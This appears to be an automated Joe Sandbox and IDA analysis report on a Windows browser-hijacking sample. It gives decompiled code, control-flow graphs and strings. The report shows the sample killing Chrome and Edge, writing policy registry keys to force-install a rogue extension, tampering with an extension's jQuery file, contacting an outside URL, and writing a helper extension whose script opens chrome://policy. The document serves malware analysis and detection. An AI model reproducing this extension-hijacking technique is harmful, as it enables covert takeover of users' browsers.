                                                                                                • String ID: /F /IM chrome.exe /T$ /F /IM msedge.exe /T$ /IM chrome.exe$ /IM msedge.exe$ https://getfiles.wiki/welcome.php$ https://getfiles.wiki/welcome.php$%s\Google\Chrome\Application\chrome.exe$%s\Google\Chrome\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma\1.0_0\src\jquery-3.5.1.min.js$%s\Google\Chrome\User Data\*.*$%s\Google\Chrome\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma$%s\Microsoft\EdgeCore\%s\msedge.exe$%s\Microsoft\Edge\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma\1.0_0\src\jquery-3.5.1.min.js$%s\Microsoft\Edge\User Data\*.*$%s\Microsoft\Edge\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma$%s\ServiceApp\apps-helper$%s\ServiceApp\apps-helper$%s\edge.crx$%s\edge.crx$1.0$1.0$1.0$1.0$C:\Program Files$Profile $Profile $SOFTWARE\Google\Chrome\Extensions$SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Microsoft\Edge\Extensions$SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Policies\Google\Chrome$SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist$SOFTWARE\Policies\Microsoft\Edge$SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist$SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist$SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist$SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist$SOFTWARE\WOW6432Node\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\WOW6432Node\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\WOW6432Node\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\WOW6432Node\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist$SOFTWARE\WOW6432Node\Policies\Microsoft\Edge\ExtensionInstallForcelist$ecffbknobglofafinobbcmaionnihcma$ecffbknobglofafinobbcmaionnihcma$ecffbknobglofafinobbcmaionnihcma$ecffbknobglofafinobbcmaionnihcma$ecffbknobglofafinobbcmaionnihcma$ecffbknobglofafinobbcmaionnihcma$open$open$path$path$path$path$version$version$version$version
                                                                                                • API String ID: 994120019-4021127192
                                                                                                • Opcode ID: 2f18b80f036f0825acbaf0a81bc9067adf750faeda611f618f92d9ef0e2b386a
                                                                                                • Instruction ID: 14db3c529547940e281c093c2b9cf139f5f537c5cb320d3a857479aed5909c80
                                                                                                • Opcode Fuzzy Hash: 2f18b80f036f0825acbaf0a81bc9067adf750faeda611f618f92d9ef0e2b386a
                                                                                                • Instruction Fuzzy Hash: E44290B0A40219AAFB77EB58CC49BF9B7B8AB14710F0046D8F6C9A61C5D7749B84CF11
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 244 1001f50-1001f67 call 100a7f0 247 1001f69 244->247 248 1001f6c-1001f9b SHGetSpecialFolderPathW call 1002b10 244->248 247->248 249 1001f6b 247->249 252 1001f9d 248->252 253 1001f9f-1001fbe call 1007be0 248->253 249->248 252->253 256 1001fc0 253->256 257 1001fc3-1001fdd FindFirstFileW 253->257 256->257 258 1001fc2 256->258 259 1001fe3-1001fea 257->259 260 1001fdf 257->260 258->257 262 1001ff0 259->262 263 1002188-10021df call 1007be0 call 1002b10 GetFileAttributesW 259->263 260->259 261 1001fe1 260->261 261->259 264 1001ff2 262->264 265 1001ff5-1001ffc 262->265 282 10021ed-1002554 RegOpenKeyExW * 5 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 263->282 264->265 267 1001ff4 264->267 268 1002002-1002012 265->268 269 100215f-1002175 FindNextFileW 265->269 267->265 272 1002018-1002031 268->272 269->265 271 100217b-1002182 FindClose 269->271 271->263 274 1002033-100203b 272->274 275 100207e-1002083 272->275 279 1002072-100207c 274->279 280 100203d-1002058 274->280 278 1002089-100209c 275->278 278->269 283 10020a2-10020b2 278->283 279->278 280->275 284 100205a-1002070 280->284 325 1002559-1002670 call 1002b60 FindNextFileW 282->325 286 10020b8-10020d1 283->286 284->272 284->279 288 10020d3-10020db 286->288 289 100211e-1002123 286->289 291 1002112-100211c 288->291 292 10020dd-10020f8 288->292 293 1002129-100213c 289->293 291->293 292->289 295 10020fa-1002110 292->295 293->269 296 100213e 293->296 295->286 295->291 298 1002140 296->298 299 1002144-100215a call 1002b40 296->299 298->299 301 1002142 298->301 299->269 308 100215c 299->308 301->299 308->269 310 100215e 308->310 310->269 330 1002676-100281e call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 325->330 361 100282f-100283b 330->361 362 10028b9 361->362 363 100283d-100283e 361->363 366 10028bb 362->366 367 10028be-10028ca Sleep 362->367 364 1002840 363->364 365 1002842-1002871 call 1002b10 363->365 364->365 375 1002873 365->375 376 1002876-10028b4 365->376 366->367 369 10028bd 366->369 370 10028cc 367->370 371 10028ce-1002900 call 1001270 * 2 367->371 369->367 370->371 383 1002902 371->383 384 1002906-1002912 Sleep 371->384 375->376 378 1002875 call 1002a33 375->378 376->361 378->376 383->384 385 1002904 383->385 386 1002914 384->386 387 1002916-1002928 call 1001330 384->387 385->384 386->387 390 100292a 387->390 391 100292c-100293b call 1002b7c 387->391 390->391
                                                                                                APIs
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000000), ref: 01001F79
                                                                                                • _memset.LIBCMT ref: 01001FB6
                                                                                                Strings
                                                                                                • %s\Microsoft\EdgeCore\%s\msedge.exe, xrefs: 010021BB
                                                                                                • SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01002346
                                                                                                • https://getfiles.wiki/welcome.php, xrefs: 01002416, 01002415
                                                                                                • ecffbknobglofafinobbcmaionnihcma, xrefs: 010023E2
                                                                                                • SOFTWARE\Microsoft\Edge\Extensions, xrefs: 010023B9
                                                                                                • %s\Microsoft\Edge\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 0100248F, 0100248E
                                                                                                • %s\Microsoft\Edge\User Data\*.*, xrefs: 01002444
                                                                                                • path, xrefs: 0100236B
                                                                                                • Default, xrefs: 010024C2
                                                                                                • open, xrefs: 01002421
                                                                                                • Profile , xrefs: 0100255E
                                                                                                • version, xrefs: 01002382
                                                                                                • ExtensionInstallAllowlist, xrefs: 010022F1
                                                                                                • SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist, xrefs: 01002266
                                                                                                • ExtensionInstallForcelist, xrefs: 01002309
                                                                                                • SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist, xrefs: 01002200
                                                                                                • %s\Microsoft\Edge\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 0100258D
                                                                                                • %s\Microsoft\EdgeCore\*.*, xrefs: 01001F86
                                                                                                • SOFTWARE\Policies\Microsoft\Edge, xrefs: 010022C8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: FolderPathSpecial_memset
                                                                                                • String ID: https://getfiles.wiki/welcome.php$%s\Microsoft\EdgeCore\%s\msedge.exe$%s\Microsoft\EdgeCore\*.*$%s\Microsoft\Edge\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma$%s\Microsoft\Edge\User Data\*.*$%s\Microsoft\Edge\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma$Default$ExtensionInstallAllowlist$ExtensionInstallForcelist$Profile $SOFTWARE\Microsoft\Edge\Extensions$SOFTWARE\Microsoft\Edge\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Policies\Microsoft\Edge$SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallAllowlist$SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist$ecffbknobglofafinobbcmaionnihcma$open$path$version
                                                                                                • API String ID: 3848166852-3189779525
                                                                                                • Opcode ID: a1dd364846733d635bf473e184c56503941a7ebefd73dfb27fc06120fceaef00
                                                                                                • Instruction ID: 62f5cd39c0f19413672a3f90c96122f933565eaf5c3c134c35cd9a43b5c1e01a
                                                                                                • Opcode Fuzzy Hash: a1dd364846733d635bf473e184c56503941a7ebefd73dfb27fc06120fceaef00
                                                                                                • Instruction Fuzzy Hash: 2322C374D002199BEB77DB68CC4CAF9B7B8AB24320F0446D9E6A9A21D5D7748BC1CF11
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 395 100180c-100180d 396 1001811-1001b75 RegOpenKeyExW * 5 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 395->396 397 100180f 395->397 421 1001b7b-1001c83 call 1002b60 FindNextFileW 396->421 397->396 426 1001c89-1001e3c call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 421->426 458 1001e4d-1001e59 426->458 459 1001ed2-1001edd Sleep 458->459 460 1001e5b 458->460 463 1001ee2-1001efc call 1001270 459->463 464 1001edf 459->464 461 1001e60-1001e8f call 1002b10 460->461 462 1001e5d 460->462 471 1001e91 461->471 472 1001e94-1001e9b 461->472 462->461 465 1001e5f 462->465 473 1001f00-1001f30 call 1001270 Sleep call 1001330 463->473 474 1001efe 463->474 464->463 467 1001ee1 464->467 465->461 467->463 471->472 476 1001e93 471->476 477 1001ecd 472->477 478 1001e9d 472->478 492 1001f35 473->492 474->473 481 1002050-1002058 476->481 477->458 482 1001ea2-1001eb2 GetFileAttributesW 478->482 483 1001e9f 478->483 484 100205a-1002070 481->484 485 100207e-1002083 481->485 488 1001eb4 482->488 489 1001ebb 482->489 483->482 487 1001ea1 483->487 490 1002072-100207c 484->490 491 1002018-1002031 484->491 495 1002089-100209c 485->495 487->482 496 1001eb6 488->496 497 1001eb9 488->497 493 1001ec0-1001ecb Sleep 489->493 494 1001ebd 489->494 490->495 491->485 504 1002033-100203b 491->504 499 1001f37 492->499 500 1001f3b-1001f4a call 1002b7c 492->500 493->472 494->493 501 1001ebf 494->501 502 10020a2-10020b2 495->502 503 100215f-1002175 FindNextFileW 495->503 496->497 498 1001eb8 496->498 497->477 498->497 499->500 505 1001f39 499->505 501->493 506 10020b8-10020d1 502->506 508 1001ff5-1001ffc 503->508 509 100217b-10021df FindClose call 1007be0 call 1002b10 GetFileAttributesW 503->509 504->490 510 100203d-100204e 504->510 505->500 511 10020d3-10020db 506->511 512 100211e-1002123 506->512 508->503 515 1002002-1002012 508->515 531 10021ed-1002554 RegOpenKeyExW * 5 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 509->531 510->481 516 1002112-100211c 511->516 517 10020dd-10020f8 511->517 519 1002129-100213c 512->519 515->491 516->519 517->512 521 10020fa-1002110 517->521 519->503 522 100213e 519->522 521->506 521->516 524 1002140 522->524 525 1002144-100215a call 1002b40 522->525 524->525 527 1002142 524->527 525->503 536 100215c 525->536 527->525 560 1002559-1002670 call 1002b60 FindNextFileW 531->560 536->503 538 100215e 536->538 538->503 565 1002676-100281e call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 560->565 596 100282f-100283b 565->596 597 10028b9 596->597 598 100283d-100283e 596->598 601 10028bb 597->601 602 10028be-10028ca Sleep 597->602 599 1002840 598->599 600 1002842-1002871 call 1002b10 598->600 599->600 610 1002873 600->610 611 1002876-10028b4 600->611 601->602 604 10028bd 601->604 605 10028cc 602->605 606 10028ce-1002900 call 1001270 * 2 602->606 604->602 605->606 618 1002902 606->618 619 1002906-1002912 Sleep 606->619 610->611 613 1002875 call 1002a33 610->613 611->596 613->611 618->619 620 1002904 618->620 621 1002914 619->621 622 1002916-1002928 call 1001330 619->622 620->619 621->622 625 100292a 622->625 626 100292c-100293b call 1002b7c 622->626 625->626
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist,00000000,000F003F,?), ref: 0100182E
                                                                                                • RegDeleteValueW.ADVAPI32(?,0100F484), ref: 0100185A
                                                                                                Strings
                                                                                                • SOFTWARE\Policies\Google\Chrome, xrefs: 010018E5
                                                                                                • %s\Google\Chrome\User Data\*.*, xrefs: 01001A65
                                                                                                • %s\Google\Chrome\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001BAF
                                                                                                • %s\Google\Chrome\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 01001AAD
                                                                                                • ExtensionInstallAllowlist, xrefs: 0100190E
                                                                                                • version, xrefs: 0100199D
                                                                                                • ecffbknobglofafinobbcmaionnihcma, xrefs: 010019FE
                                                                                                • Profile , xrefs: 01001B80
                                                                                                • open, xrefs: 01001A3C
                                                                                                • SOFTWARE\Google\Chrome\Extensions, xrefs: 010019DA
                                                                                                • path, xrefs: 01001986
                                                                                                • SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist, xrefs: 01001824
                                                                                                • Default, xrefs: 01001ADD
                                                                                                • SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma, xrefs: 0100195C
                                                                                                • ExtensionInstallForcelist, xrefs: 01001925
                                                                                                • https://getfiles.wiki/welcome.php, xrefs: 01001A30
                                                                                                • SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 0100188A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteOpenValue
                                                                                                • String ID: https://getfiles.wiki/welcome.php$%s\Google\Chrome\User Data\%s\Extensions\ecffbknobglofafinobbcmaionnihcma$%s\Google\Chrome\User Data\*.*$%s\Google\Chrome\User Data\Default\Extensions\ecffbknobglofafinobbcmaionnihcma$Default$ExtensionInstallAllowlist$ExtensionInstallForcelist$Profile $SOFTWARE\Google\Chrome\Extensions$SOFTWARE\Google\Chrome\Extensions\ecffbknobglofafinobbcmaionnihcma$SOFTWARE\Policies\Google\Chrome$SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist$SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist$ecffbknobglofafinobbcmaionnihcma$open$path$version
                                                                                                • API String ID: 2654517830-605086317
                                                                                                • Opcode ID: 56831fbf5a55252b2d00f73e3a7422fff3bb2fd55189ca3160938cdc0ae3bf59
                                                                                                • Instruction ID: 5b0389ea9b26744d41d1fed9f02437910aa60ef9b1a261500a6972e9c1aa40be
                                                                                                • Opcode Fuzzy Hash: 56831fbf5a55252b2d00f73e3a7422fff3bb2fd55189ca3160938cdc0ae3bf59
                                                                                                • Instruction Fuzzy Hash: 82E1D4B09042199BEB73DBA8DC49AE8B7B4FB55321F0046C9E5A9A61D1DB74CB80CF11
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 630 1001460-1001473 631 1001475 630->631 632 1001478-10014a2 call 1002b10 CreateDirectoryW 630->632 631->632 633 1001477 631->633 636 10014a4 632->636 637 10014a6-10014c0 call 1002b10 632->637 633->632 636->637 640 10014c2 637->640 641 10014c6-10014d5 CreateDirectoryW 637->641 640->641 642 10014c4 640->642 643 10014d7 641->643 644 10014da-10014f4 call 1002b10 641->644 642->641 643->644 646 10014d9 643->646 648 10014f6 644->648 649 10014fa-100151f CreateFileW 644->649 646->644 648->649 650 10014f8 648->650 651 1001521 649->651 652 1001524-100152b 649->652 650->649 651->652 653 1001523 651->653 654 1001570 652->654 655 100152d 652->655 653->652 656 1001572 654->656 657 1001575-1001587 654->657 658 1001533-1001559 call 1001000 WriteFile 655->658 659 100152f 655->659 656->657 661 1001574-1001588 call 1002b10 656->661 662 100158d-1001591 657->662 663 1001588 call 1002b10 657->663 668 100155b 658->668 669 100155e-100156b CloseHandle 658->669 659->658 664 1001531 659->664 661->662 666 1001593-10015ba CreateFileW 662->666 667 1001595-10015ba CreateFileW 662->667 663->662 664->658 671 10015bc 666->671 672 10015bf-10015c6 666->672 667->671 667->672 668->669 673 100155d 668->673 669->654 674 100156d 669->674 671->672 679 10015be 671->679 676 1001605 672->676 677 10015c8 672->677 673->669 674->654 680 100156f 674->680 681 1001607 676->681 682 100160a-1001625 call 1002b10 676->682 683 10015ca 677->683 684 10015cd-10015f4 call 1001000 WriteFile 677->684 679->679 680->661 681->682 685 1001609 681->685 691 1001627 682->691 692 100162a-1001650 CreateFileW 682->692 683->684 687 10015cc 683->687 693 10015f6 684->693 694 10015f8-10015ff CloseHandle 684->694 685->682 687->684 691->692 695 1001629 691->695 696 1001652 692->696 697 1001654-100165b 692->697 693->694 694->676 695->692 696->697 698 100169a 697->698 699 100165d 697->699 702 100169c 698->702 703 100169f-10016b9 call 1002b10 698->703 700 1001662-1001688 call 1001000 WriteFile 699->700 701 100165f 699->701 710 100168a 700->710 711 100168d-1001694 CloseHandle 700->711 701->700 704 1001661 701->704 702->703 706 100169e 702->706 712 10016bb 703->712 713 10016be-10016e3 CreateFileW 703->713 704->700 706->703 710->711 717 100168c 710->717 711->698 712->713 714 10016bd 712->714 715 10016e5 713->715 716 10016e8-10016ef 713->716 714->713 715->716 718 10016e7 715->718 719 10016f1 716->719 720 100172e-100173b call 1002b7c 716->720 717->711 718->716 721 10016f3 719->721 722 10016f6-100171c call 1001000 WriteFile 719->722 721->722 724 10016f5 721->724 728 1001721-1001728 CloseHandle 722->728 729 100171e 722->729 724->722 728->720 729->728 730 1001720 729->730 730->728
                                                                                                C-Code - Quality: 29%
                                                                                                			E01001460(void* __ebx, void* __edi, void* __esi) {
                                                                                                				signed int _v8;
                                                                                                				short _v532;
                                                                                                				void* _v536;
                                                                                                				void* _v540;
                                                                                                				void* _v544;
                                                                                                				void* _v548;
                                                                                                				signed int _t42;
                                                                                                				signed int _t43;
                                                                                                				intOrPtr _t44;
                                                                                                				intOrPtr _t47;
                                                                                                				intOrPtr _t50;
                                                                                                				void* _t52;
                                                                                                				void* _t55;
                                                                                                				void* _t78;
                                                                                                				intOrPtr _t92;
                                                                                                				void* _t97;
                                                                                                				void* _t98;
                                                                                                				signed int _t99;
                                                                                                				signed int _t107;
                                                                                                				void* _t108;
                                                                                                				void* _t109;
                                                                                                
                                                                                                				_t98 = __esi;
                                                                                                				_t97 = __edi;
                                                                                                				_t78 = __ebx;
                                                                                                				_t42 =  *0x100e004; // 0xa4df7d0e
                                                                                                				_t43 = _t42 ^ _t99;
                                                                                                				_t107 = _t43;
                                                                                                				_v8 = _t43;
                                                                                                				if(_t107 != 0 && _t107 == 0) {
                                                                                                				}
                                                                                                				_t44 =  *0x101d264; // 0x145f9e0
                                                                                                				E01002B10( &_v532,  &_v532, L"%s\\ServiceApp", _t44);
                                                                                                				CreateDirectoryW( &_v532, 0); // executed
                                                                                                				asm("clc");
                                                                                                				if(_t107 < 0) {
                                                                                                					0xd364b691();
                                                                                                				}
                                                                                                				_t47 =  *0x101d264; // 0x145f9e0
                                                                                                				E01002B10( &_v532,  &_v532, L"%s\\ServiceApp\\apps-helper", _t47);
                                                                                                				if(_t107 != 0 && _t107 == 0) {
                                                                                                					0xf095();
                                                                                                				}
                                                                                                				 *((intOrPtr*)( &_v532 - 1))(0);
                                                                                                				asm("adc eax, 0x101d284"); // executed
                                                                                                				if(_t107 != 0 && _t107 == 0) {
                                                                                                					0x2d2797f();
                                                                                                				}
                                                                                                				_t50 =  *0x101d264; // 0x145f9e0
                                                                                                				_t81 =  &_v532;
                                                                                                				E01002B10( &_v532,  &_v532, L"%s\\ServiceApp\\apps-helper\\manifest.json", _t50);
                                                                                                				if(_t107 != 0 && _t107 == 0) {
                                                                                                					0x80();
                                                                                                				}
                                                                                                				_t52 = CreateFileW( &_v532, 0x40000000, 1, 0, 2, 0x80, 0); // executed
                                                                                                				_v536 = _t52;
                                                                                                				if(_t107 != 0 && _t107 == 0) {
                                                                                                					0xfeecd2ab();
                                                                                                				}
                                                                                                				_t108 = _v536 - 0xffffffff;
                                                                                                				if(_t108 != 0) {
                                                                                                					if(_t108 != 0 && _t108 == 0) {
                                                                                                						0x6800();
                                                                                                					}
                                                                                                					WriteFile(_v536, E01001000(_t81, "{\r\n\t\"name\": \"Apps\",\r\n\t\"description\": \"\",\r\n\t\"version\": \"1.0\",\r\n\t\"manifest_version\": 3,\r\n\t\"background\": {\r\n\t\t\"service_worker\": \"service.js\",\r\n\t\t\"type\": \"module\"\r\n\t},\r\n\t\"permissions\": [\"tabs\", \"scripting\", \"management\", \"background\"],\r\n\t\"host_permissions\": [\"chrome://*/*\"]\r\n}", 0x111), 0x111, 0, 0); // executed
                                                                                                					if(_t108 > 0 && _t108 <= 0) {
                                                                                                						0xfeeca2ed();
                                                                                                					}
                                                                                                					_t81 = _v536;
                                                                                                					 *((intOrPtr*)(_t81 - 1))();
                                                                                                					asm("adc eax, 0x100c00c");
                                                                                                					if(_t108 > 0 && _t108 <= 0) {
                                                                                                						0x27f18f2();
                                                                                                					}
                                                                                                				}
                                                                                                				if(_t108 > 0 && _t108 <= 0) {
                                                                                                					0xd3642b04();
                                                                                                				}
                                                                                                				_t92 =  *0x101d264; // 0x145f9e0
                                                                                                				E01002B10(_t81,  &_v532, L"%s\\ServiceApp\\apps-helper\\service.js", _t92);
                                                                                                				asm("clc");
                                                                                                				if(_t108 < 0) {
                                                                                                					0x69008080();
                                                                                                				}
                                                                                                				_t55 = CreateFileW( &_v532, 0x40000000, 1, 0, 2, 0x80, 0); // executed
                                                                                                				_v540 = _t55;
                                                                                                				if(_t108 != 0 && _t108 == 0) {
                                                                                                				}
                                                                                                				_t109 = _v540 - 0xffffffff;
                                                                                                				_push( *((intOrPtr*)(_t99 + _t97 + 0x7e)));
                                                                                                			}
























                                                                                                0x01001460
                                                                                                0x01001460
                                                                                                0x01001460
                                                                                                0x01001469
                                                                                                0x0100146e
                                                                                                0x0100146e
                                                                                                0x01001470
                                                                                                0x01001473
                                                                                                0x01001473
                                                                                                0x01001478
                                                                                                0x0100148a
                                                                                                0x0100149b
                                                                                                0x010014a1
                                                                                                0x010014a2
                                                                                                0x010014a4
                                                                                                0x010014a4
                                                                                                0x010014a6
                                                                                                0x010014b8
                                                                                                0x010014c0
                                                                                                0x010014c4
                                                                                                0x010014c4
                                                                                                0x010014cd
                                                                                                0x010014d0
                                                                                                0x010014d5
                                                                                                0x010014d9
                                                                                                0x010014d9
                                                                                                0x010014da
                                                                                                0x010014e5
                                                                                                0x010014ec
                                                                                                0x010014f4
                                                                                                0x010014f8
                                                                                                0x010014f8
                                                                                                0x01001513
                                                                                                0x01001519
                                                                                                0x0100151f
                                                                                                0x01001523
                                                                                                0x01001523
                                                                                                0x01001524
                                                                                                0x0100152b
                                                                                                0x0100152d
                                                                                                0x01001531
                                                                                                0x01001531
                                                                                                0x01001553
                                                                                                0x01001559
                                                                                                0x0100155d
                                                                                                0x0100155d
                                                                                                0x0100155e
                                                                                                0x01001563
                                                                                                0x01001566
                                                                                                0x0100156b
                                                                                                0x0100156f
                                                                                                0x0100156f
                                                                                                0x0100156b
                                                                                                0x01001570
                                                                                                0x01001574
                                                                                                0x01001574
                                                                                                0x01001575
                                                                                                0x01001588
                                                                                                0x01001590
                                                                                                0x01001591
                                                                                                0x01001593
                                                                                                0x01001593
                                                                                                0x010015ae
                                                                                                0x010015b4
                                                                                                0x010015ba
                                                                                                0x010015ba
                                                                                                0x010015bf
                                                                                                0x010015c5

                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0100149B
                                                                                                Strings
                                                                                                • %s\ServiceApp, xrefs: 0100147E
                                                                                                • %s\ServiceApp\apps-helper\service.js, xrefs: 0100157C
                                                                                                • {"name": "Apps","description": "","version": "1.0","manifest_version": 3,"background": {"service_worker": "service.js","type": "module"},"permissions": ["tabs", "scripting", "management", "background"],"host_permissions": ["chro, xrefs: 01001541
                                                                                                • %s\ServiceApp\apps-helper, xrefs: 010014AC
                                                                                                • %s\ServiceApp\apps-helper\manifest.json, xrefs: 010014E1, 010014E0
                                                                                                • chrome.management.onInstalled.addListener(info => {if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id, xrefs: 010015DB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDirectory
                                                                                                • String ID: %s\ServiceApp$%s\ServiceApp\apps-helper$%s\ServiceApp\apps-helper\manifest.json$%s\ServiceApp\apps-helper\service.js$chrome.management.onInstalled.addListener(info => {if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id${"name": "Apps","description": "","version": "1.0","manifest_version": 3,"background": {"service_worker": "service.js","type": "module"},"permissions": ["tabs", "scripting", "management", "background"],"host_permissions": ["chro
                                                                                                • API String ID: 4241100979-2197705422
                                                                                                • Opcode ID: 1f53de3c2d16805fd1ab0b289711663fcc9181091f6ae3cc883271afb85d977c
                                                                                                • Instruction ID: f9f5fff4bbca6b0d6e00f52eeb778684ff409391945130c26b8051a15cf61812
                                                                                                • Opcode Fuzzy Hash: 1f53de3c2d16805fd1ab0b289711663fcc9181091f6ae3cc883271afb85d977c
                                                                                                • Instruction Fuzzy Hash: 9F41FB70944305ABF7B3E76C9C49BE937B4AB24721F080784F6F55A0D1DAB6C581CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
